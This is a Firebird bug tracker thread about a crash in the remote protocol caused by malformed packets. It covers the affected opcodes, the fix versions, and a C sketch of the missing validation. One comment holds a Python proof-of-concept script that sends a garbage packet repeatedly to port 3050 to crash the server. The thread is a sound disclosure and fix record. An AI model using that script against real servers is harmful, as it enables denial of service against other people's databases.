Garbage data in the incoming remote packet may crash the server [CORE1681] #2106

Closed
firebird-issue-importer opened this issue Jan 9, 2008 · 11 comments

Comments

@firebird-issue-importer firebird-issue-importer commented Jan 9, 2008

Submitted by: @dyemanov

If some kinds of remote packets contain wrong (garbage) data, it may cause an invalid memory access inside the server, forcing a crash. Reported by Core Security Labs, the disclosure is published here: http://www.coresecurity.com/?action=item&id=2095

Commits: 3201c3d 84a0dc8 ee8fdef

@firebird-issue-importer firebird-issue-importer commented Jan 9, 2008

Commented by: @dyemanov

The affected packet types are: op_receive, op_start, op_start_and_receive, op_send, op_start_and_send, op_start_send_and_receive. The bug is caused by lack of validation for a not yet allocated port_object_vector in a few places of the remote subsystem.

Test case in Python:

import socket
import time

def getTargetIP():
    return '127.0.0.1'

port = 3050
op = '\x4a'

packet = '\x00\x00\x00' + op + 'A' * 2000

for i in range(0, 5):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((getTargetIP(), port))
    s.send(str(packet))
    s.close()
    time.sleep(1)
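
The missing validation described in the comment above, as an added C sketch that is not Firebird's code and not part of the original issue. The struct and function names (`port`, `object_vector`, `lookup_unchecked`, `lookup_checked`, `handle_request`) are hypothetical, and the model assumes a per-connection object table that is allocated lazily and indexed by an id read from the packet.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Hypothetical model, not Firebird source: a per-connection table of
   server objects that stays unallocated until the first object exists. */
struct object_vector {
    uint32_t count;
    void   **slots;
};

struct port {
    struct object_vector *objects;   /* NULL until something is allocated */
};

/* Unchecked pattern, shown for contrast only and never called here:
   assumes the vector exists and the wire-supplied id is in range. */
void *lookup_unchecked(const struct port *p, uint32_t id)
{
    return p->objects->slots[id];
}

/* Checked pattern: each step that depends on packet data is validated,
   so the caller gets NULL (reject the packet) instead of a fault. */
void *lookup_checked(const struct port *p, uint32_t id)
{
    if (p == NULL || p->objects == NULL)   /* nothing allocated yet */
        return NULL;
    if (id >= p->objects->count)           /* id outside the table */
        return NULL;
    return p->objects->slots[id];          /* may be NULL: empty slot */
}

/* Returns 1 if the object id carried by a request resolves, else 0. */
int handle_request(const struct port *p, uint32_t wire_id)
{
    return lookup_checked(p, wire_id) != NULL;
}

int main(void)
{
    struct port fresh = { NULL };          /* constructed: new connection */
    printf("fresh port, garbage id -> %d\n",
           handle_request(&fresh, 0x41414141u));
    return 0;
}
```
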

@firebird-issue-importer firebird-issue-importer commented Jan 9, 2008

Modified by: @dyemanov

Fix Version: 2.0.4 [ 10211 ]

Fix Version: 1.5.6 [ 10225 ]

@firebird-issue-importer firebird-issue-importer commented Jan 10, 2008

Modified by: @dyemanov

status: Open [ 1 ] => Resolved [ 5 ]

resolution: Fixed [ 1 ]

Fix Version: 2.1 RC1 [ 10201 ]

@firebird-issue-importer firebird-issue-importer commented Jan 10, 2008

Modified by: @dyemanov

description: If some kinds of remote packets contain wrong (garbage) data, it may cause an invalid memory access inside the server, forcing a crash. => If some kinds of remote packets contain wrong (garbage) data, it may cause an invalid memory access inside the server, forcing a crash. Reported by Core Security Labs.

@firebird-issue-importer firebird-issue-importer commented Jan 10, 2008

Modified by: @dyemanov

Attachment: CORE2007-1219-firebird-advisory.pdf [ 10742 ]

@firebird-issue-importer firebird-issue-importer commented Jan 10, 2008

Modified by: @dyemanov

Attachment: CORE2007-1219-firebird-advisory.pdf [ 10742 ] =>

@firebird-issue-importer firebird-issue-importer commented Jan 28, 2008

Modified by: @dyemanov

description: If some kinds of remote packets contain wrong (garbage) data, it may cause an invalid memory access inside the server, forcing a crash. Reported by Core Security Labs. => If some kinds of remote packets contain wrong (garbage) data, it may cause an invalid memory access inside the server, forcing a crash. Reported by Core Security Labs, the disclosure is published here: http://www.coresecurity.com/?action=item&id=2095

@firebird-issue-importer firebird-issue-importer commented Jan 28, 2008

Modified by: @pcisar

Workflow: jira [ 13806 ] => Firebird [ 14118 ]

@firebird-issue-importer firebird-issue-importer commented Nov 18, 2008

Modified by: @pcisar

status: Resolved [ 5 ] => Closed [ 6 ]

@firebird-issue-importer firebird-issue-importer commented Jan 19, 2016

Modified by: @pavel-zotov

QA Status: No test

@firebird-issue-importer firebird-issue-importer commented Aug 20, 2016

Modified by: @pavel-zotov

status: Closed [ 6 ] => Closed [ 6 ]

QA Status: No test => Cannot be tested
